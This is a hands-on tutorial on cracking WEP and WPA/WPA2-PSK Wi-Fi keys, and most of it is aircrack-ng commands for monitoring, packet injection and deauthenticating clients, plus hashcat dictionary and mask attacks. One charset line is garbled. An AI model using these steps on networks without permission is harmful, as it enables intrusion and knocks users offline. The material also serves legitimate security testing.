Cracking WEP and WPA
I've used a combination of Linux and Windows in this article. Kali for the WiFi monitoring and Aircrack-ng tools, and Windows (my gaming computer) for the actual cracking since its GTX 970 is far more powerful than what I used in the laptop running Kali (no wifi in my gaming rig). WEP is extremely quick to crack (10-30 sec of listening to traffic), so don't use it, ever. It took me 30 min to crack a purely numerical WPA2-PSK password of 8 length. But hashcat projected a month for a lowercase password. Over a year for an alphanumerical one. Increasing the length to 13 alphanumerical characters also increased the time to >10 years. Use a special character as well, and you're pretty safe.
WEP
N = variable number based on individual situation.
############
Cracking WEP
############
Cracking a WEP key can be done deterministically by analyzing enough packets.
FIRST TERMINAL WINDOW (you'll be managing two)
Prepare wifi device for penetration testing/listening mode:
# airmon-ng check kill
# airmon-ng start wlanN
Scan for wireless networks and stations:
# airodump-ng wlanNmon
Choose a target AP and station and listen to them exclusively:
# airodump-ng --bssid <AP MAC> -c <channel N> wlanNmon -w <ESSID for handshake output filename>
SECOND TERMINAL WINDOW
We need traffic to seed the cracking part. Wait for traffic
(we want 5-6000 packets) or inject some to help this go faster.
# aireplay-ng --arpreplay -b <AP MAC> -h <STATION MAC> wlanNmon
Crack the WEP key when you're happy with number of packets (or use a pipe).
# aircrack-ng -z ESSID.cap
TIP:
To use the key, just remove the ":".
E.g. AB:CD:E1:23:45 = ABCDE12345
WPA/WPA2-PSK
N = variable number based on individual situation.
#################
Cracking WPA/WPA2
#################
Cracking a WPA key can be done by capturing and attacking a connection handshake.
FIRST TERMINAL WINDOW (you'll be managing two)
Prepare wifi device for penetration testing/listening mode:
# airmon-ng check kill
# airmon-ng start wlanN
Scan for wireless networks and stations:
# airodump-ng wlanNmon
Choose a target AP and station and listen to them exclusively:
# airodump-ng --bssid <AP MAC> -c <channel N> wlanNmon -w <ESSID for handshake output filename>
SECOND TERMINAL WINDOW
Attempt a forced re-connect so we can capture their handshake:
# aireplay-ng --deauth 5 -a <AP MAC> -c <STATION MAC> wlanNmon
NOTE: If -c parameter is omitted, all clients are disconnected.
This is a noisy action, but also means a bigger school of fish.
But, broadcast doesn't always work.
WAIT FOR HANDSHAKE IN FIRST TERMINAL WINDOW. (TIP: Capture file can be human-read with wireshark).
Prepare handshake/cap file for GPU based oclHashcat cracking:
# wpaclean <out.cap> <in.cap>
# aircrack-ng <out.cap> -J <out.hccap>
THE CRACKING PART
Windows (ocl/cuda)hashcat examples:
You can download oclHashcat @ http://hashcat.net/hashcat/
Dictionary attack:
C:\> cudaHashcat64.exe -m 2500 out.hccap wordlist.txt (-r rule1.rule etc if using rules)
Mask attack (Brute Force):
C:\> cudaHashcat64.exe -m 2500 -a 3 -i out.hccap ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a
NOTES on mask charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = «space»!"#$%&'()*+,-./:;<=>[email protected][\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
TIP:
-1 creates a custom charset, -2 a second one, and so on.
E.g. alphanumeric custom pattern [a-Z0-9] 5 times =
C:\>cudaHashcat64.exe -m 2500 -a 3 -i out.hccap -1 ?l?d ?1?1?1?1?1
NOTE on result:
Cracked password will be saved in a .pot file.
More information about the tools:
Hashcat wiki
Aircrack-ng suite wiki